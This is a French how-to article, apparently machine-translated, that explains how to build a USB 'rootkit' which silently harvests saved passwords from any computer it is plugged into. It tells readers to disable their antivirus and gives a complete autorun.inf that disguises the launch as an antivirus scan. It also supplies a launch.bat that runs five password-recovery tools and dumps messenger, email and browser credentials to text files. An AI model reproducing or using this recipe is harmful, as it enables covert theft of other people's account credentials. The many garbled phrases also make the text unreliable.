Comme nous le savons tous, Windows stocke un maximum de mots de passe utilisés chaque jour, ainsi que des mots de passe de messagerie instantanés tels que MSN, Yahoo, AOL, Windows Messenger, etc. À côté de ceux-ci, Windows stocke également des mots de passe. des factures spécifiques à Outlook, SMTP, POP, FTP et des mots de passe complets automatiques de nombreux navigateurs comme IE et Firefox à l’aide de USB Drive Hacks.
Il existe de nombreux outils pour récupérer ces mots de passe à partir de leurs emplacements stockés. L’utilisation de ces outils et d’une clé USB vous permet de créer votre rootkit pour renifler les mots de passe de n’importe quel ordinateur. Nous avons besoin de l’équipement suivant pour créer notre rootkit :
MessenPass : Récupère immédiatement les mots de passe des programmes Messenger les plus populaires : MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instantaneous Messenger fourni avec Netscape 7, Trillian, Miranda et GAIM.
Mail PassView : Récupère les mots de passe des applications de messagerie électronique suivantes : Outlook explicite, Microsoft Outlook 2000 (dettes POP3 et SMTP les plus pratiques), Microsoft Outlook 2002/2003 (dettes POP3, IMAP, HTTP et SMTP), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail perd.
Mail PassView peut également récupérer les mots de passe des factures de courrier électronique basées sur le Web (HotMail, Yahoo!, Gmail), au cas où vous utiliseriez les packages associés à cet argent dû.
Vue IE Pass : IE PassView est un petit utilitaire qui révèle les mots de passe enregistrés par le navigateur Internet Explorer. Il prend en charge le tout nouveau net Explorer 7.zero, ainsi que les anciennes variantes d’Internet Explorer, v4.0 – v6.0
Stockage de mot de passe PassView : récupère tous les mots de passe enregistrés dans le garage protégé, comprenant les mots de passe de saisie semi-automatique d’Internet Explorer, les mots de passe des sites inclus dans le mot de passe, les mots de passe MSN Explorer, etc.
PasswordFox : PasswordFox est un petit dispositif de restauration de mot de passe qui vous permet de visualiser les noms et mots de passe des consommateurs enregistrés à l’aide du navigateur Internet Mozilla Firefox. Par défaut, PasswordFox affiche les mots de passe enregistrés dans votre profil moderne, cependant, vous pouvez facilement choisir de regarder les mots de passe de tous les autres profils Firefox. Pour chaque entrée de mot de passe, les faits suivants sont affichés :
Index des documents, site Internet en ligne, nom du consommateur, mot de passe, discipline du nom d’utilisateur et zone de mot de passe.
Préparez votre clé USB pour le piratage de mots de passe :
Voici un processus étape par étape pour créer la boîte à outils de piratage de mot de passe :
Vous devez désactiver brièvement votre antivirus avant de suivre ces étapes.
- Téléchargez tous les 5 outils, extrayez-les et copiez uniquement les fichiers exécutables (fichiers .exe) sur votre clé USB.ie : Copiez les fichiers – mspass.exe , mailpv.exe , iepv.exe , pspv.exe et passwordfox.exe dans votre clé USB.
- Créez un nouveau bloc-notes et écrivez-y le texte suivant :
[autorun] open=launch.bat ACTION= Effectuer une analyse antivirus
enregistrez le Bloc-notes et renommez-le de New Text Document.txt en autorun.inf . Copiez maintenant le fichier autorun.inf sur votre clé USB.
- Créez un autre bloc-notes et écrivez-y le texte suivant :
démarrer mspass.exe /stext mspass.txt démarrer mailpv.exe /stext mailpv.txt démarrer iepv.exe /stext iepv.txt démarrer pspv.exe /stext pspv.txt démarrer passwordfox.exe /stext passwordfox.txt
Enregistrez le Bloc-notes et renommez-le de New Text Document.txt en launch.bat . Copiez le fichier launch.bat sur votre clé USB.
Maintenant, votre rootkit est prêt et vous êtes prêt à renifler les mots de passe. Vous pouvez utiliser cette clé USB sur n’importe quel ordinateur pour renifler les mots de passe stockés. Suivez simplement ces étapes :
- Insérez la clé USB et la fenêtre d’exécution automatique apparaîtra. (C’est parce que nous avons créé une clé USB à exécution automatique).
- Dans la fenêtre contextuelle, sélectionnez la première option ( Effectuer une analyse antivirus ).
- Désormais, tous les outils de récupération de mot de passe seront exécutés silencieusement en arrière-plan (ce processus ne prend que quelques secondes). Les mots de passe sont stockés dans le. Fichiers TXT .
- Retirez la clé USB et vous verrez les mots de passe stockés dans le fichier. Fichiers TXT .